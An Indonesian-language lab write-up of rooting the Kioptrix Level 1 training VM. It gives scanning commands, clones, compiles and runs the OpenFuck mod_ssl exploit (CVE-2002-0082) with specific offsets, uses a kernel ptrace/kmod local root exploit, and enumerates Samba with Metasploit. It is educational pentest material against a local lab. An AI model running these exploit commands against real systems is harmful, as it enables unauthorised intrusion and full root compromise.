Machine Writeup: Kioptrix Level 1 (#1)

Kali ini saya akan membahas mengenai bagaimana cara mendapatkan akses root pada mesin Kioptrix Level 1. Mesin Kioptrix sendiri terdiri dari 5 mesin, yang selanjutnya akan kita sebut Kioptrix Series. Dan yang akan kita bahas pada artikel kali ini adalah level pertama atau yang termudah.

Informasi Mesin

Name: Kioptrix: Level 1 (#1)
Date release: 17 Feb 2010
Author: Kioptrix
Series: Kioptrix

Download Link

Kioptrix_Level_1.rar (Size: 186 MB)
Download: https://exploit.linuxsec.org/kioptrix-1-dl

Untuk writeup dari mesin kioptrix sendiri saya kira sudah cukup banyak, namun disini saya akan membahas secara detail metodologi yang digunakan dalam pentesting. Sehingga nantinya catatan singkat saya ini akan berguna bagi siapapun yang ingin terjun di bidang cyber security. Apalagi sampai saat ini saya masih meyakini bahwa Kioptrix Series ini adalah salah satu seri mesin yang akan sangat berguna bagi “pemula” untuk memahami hal dasar yang harus diperhatikan dalam pentesting. Harapannya, dengan menyelesaikan 5 mesin Kioptrix dari rangkaian Kioptrix Series, kalian sudah memiliki modal dasar untuk terjun di dunia cyber security, terutama untuk bidang penetration testing.

Oke langsung saja ke tutorialnya.

Menemukan IP Mesin Kioptrix

Disini saya menggunakan VMware Player dengan konfigurasi jaringan NAT untuk mesin Kioptrix, yangmana untuk NAT sendiri di VMware memakai interface vmnet8, dengan IP 192.168.106.1/24. Sehingga untuk menemukan IP mesin Kioptrix, cukup jalankan nmap dengan perintah berikut:

nmap -sn 192.168.106.1/24

Oke, disini kita tau bahwa IP target kita adalah 192.168.106.135.

Reconnaissance

Tahapan pertama adalah enumeration, untuk mendapatkan informasi sebanyak-banyaknya mengenai mesin target.

Port Scanning

Kita gunakan nmap untuk memindai server target, melihat port berapa yang terbuka, service apa yang berjalan, dan kemungkinan service yang memiliki kerentanan.

sudo nmap -sV -sT -sC -A -oA koptrix_lv1 192.168.106.135

Output:
Oke dari proses port scanning, berikut beberapa informasi awal yang dapat kita manfaatkan.

• Running service: Apache, Samba, SSH
• Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
• SSH: OpenSSH 2.9p2 (protocol 1.99)

Directory Scanning

Selanjutnya adalah melakukan directory scanning pada web service yang berjalan. Tujuannya adalah untuk mengetahui kemungkinan adanya file sensitif yang ada di website target. Untuk tool yang digunakan, disini saya menggunakan ffuf, dengan wordlist default milik dirb di Kali Linux.

ffuf -recursion-depth 3 -t 100 -w /usr/share/wordlists/dirb/common.txt -u http://192.168.106.135/FUZZ -r

Tidak ditemukan file sensitif yang terekspos. Saya sudah mencoba menggunakan wordlist lain namun hasilnya tetap sama. Tidak ditemukan file maupun direktori sensitif.

Vulnerability Assessment

Tahapan selanjutnya adalah melakukan VA menggunakan beberapa tool opensource. Disini salahsatu tool opensource yang saya rekomendasikan adalah nikto.

nikto -o kioptrix_lv1.html -h http://192.168.106.135

Output:

Dan berikut report dalam format HTML yang sudah kita generate sebelumnya:

Dari hasil scanning Nikto, ada beberapa kerentanan yang terdeteksi, dan diantaranya ada satu kerentanan yang mungkin bisa kita gunakan untuk mendapatkan initial access ke server, yakni kerentanan remote buffer overflow pada mod_ssl (CVE-2002-0082).

Exploitation

Melalui tahapan recon, kita sudah mendeteksi kerentanan yang bisa kita manfaatkan untuk mendapatkan akses ke sistem. Public exploit yang dapat kita gunakan bisa diunduh melalui link berikut.

git clone https://github.com/heltonWernik/OpenFuck.git
apt-get install libssl-dev
gcc -o CVE-2002-0082 OpenFuck.c -lcrypto
./CVE-2002-0082

Dari tahap recon, kita mengetahui bahwa kita menggunakan RedHat dan Apache/1.3.20. Maka kita bisa coba offset 0x6a atau 0x6b.

./CVE-2002-0082 0x6b 192.168.106.135 443 -c 100

Post Exploitation

Pada tahap ini biasanya dipakai untuk melakukan privilege escalation dari user yang kita dapat pada tahap sebelumnya. Namun, karena kita sendiri sudah mendapatkan hak akses root dari tahap exploitation, disini saya akan mencoba privilege escalation dari salah satu user yang tersedia disana.

passwd john

Lalu kita coba akses server Kioptrix melalui SSH menggunakan user john.

ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 -o Ciphers=aes256-cbc [email protected]

Selanjutnya cek versi kernel yang digunakan untuk menentukan exploit yang nanti akan digunakan.

uname -rv

Output:

2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001

Sekarang kita bisa gunakan searchsploit untuk mencari apakah ada local exploit yang cocok untuk versi kernel dan OS yang kita punya.

searchsploit "redhat 2.4"

Versi kernel tersebut rentan terhadap serangan CVE-2003-0127 (Linux Kernel 2.2.x/2.4.x (RedHat) – ‘ptrace/kmod’ Local Privilege Escalation). Sekarang tinggal kita compile local root dari Exploit DB tersebut dan eksekusi file exploitnya.

Oke, kita berhasil mereproduce apa yang mungkin tidak dijelaskan pada tahap exploitation. Ya, script CVE-2002-0082 yang kita pakai sebenarnya memang sudah secara otomatis mengunduh local exploit ptrace/kmod setelah berhasil mendapatkan akses shell sehingga pada hasil akhir kita otomatis mendapatkan akses root.

Shell Access via Samba Exploit

Sebenarnya goal dari mesin ini sudah selesai karena kita sudah mendapatkan akses root. Namun tidak ada salahnya kita coba explore lebih jauh untuk mengetahui kemungkinan akses masuk lain. Nah, setelah berhasil mendapatkan root, kita bisa melihat proses lain yang berjalan menggunakan netstat.

Terlihat versi Samba yang digunakan adalah 2.2.1.a. Sebenarnya kita juga bisa mengenumerasi versi Samba menggunakan Metasploit.

msfconsole
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.106.135
run

Versi ini memiliki kerentanan CVE-2003-0201. Untuk exploitnya bisa gunakan versi berikut.

Root message:

Oke mungkin sekian sharing kali ini. Kita lanjut ke Kioptrix Level 2 di lain waktu.